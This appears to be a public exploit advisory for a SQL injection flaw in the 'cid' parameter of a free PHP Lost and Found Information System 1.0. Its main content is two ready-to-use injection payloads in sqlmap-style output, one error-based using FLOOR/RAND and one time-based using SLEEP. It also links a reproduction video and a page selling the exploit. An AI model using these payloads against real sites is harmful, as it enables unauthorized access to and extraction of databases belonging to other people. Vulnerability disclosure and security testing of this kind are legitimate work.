# Titles: Lost and Found Information System-1.0 SQLi
# Author: nu11secur1ty
# Date: 08/05/2025
# Vendor: https://github.com/oretnom23
# Software:
https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html
# Reference: https://portswigger.net/web-security/sql-injection

## Description:
The cid parameter appears to be vulnerable to SQL injection attacks. A
single quote was submitted in the cid parameter, and a database error
message was returned. Two single quotes were then submitted and the error
message disappeared. You should review the contents of the error message,
and the application's handling of other input, to confirm whether a
vulnerability is present.

STATUS: HIGH-CRITICAL Vulnerability


[+]Exploit:
- SQLi:

```SQLi
---
Parameter: cid (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (FLOOR)
    Payload: page=items&cid=1' AND (SELECT 5436 FROM(SELECT
COUNT(*),CONCAT(0x7176787671,(SELECT
(ELT(5436=5436,1))),0x717a6a7071,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)# crEm

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=items&cid=1' AND (SELECT 4729 FROM
(SELECT(SLEEP(7)))Bkuo)# Cdpc
---
```

# Reproduce:
[href](https://www.youtube.com/watch?v=Py2fywLsjYc)

# Buy an exploit only:
[href](https://www.patreon.com/posts/lost-and-found-1-135775268)

# Time spent:
01:15:00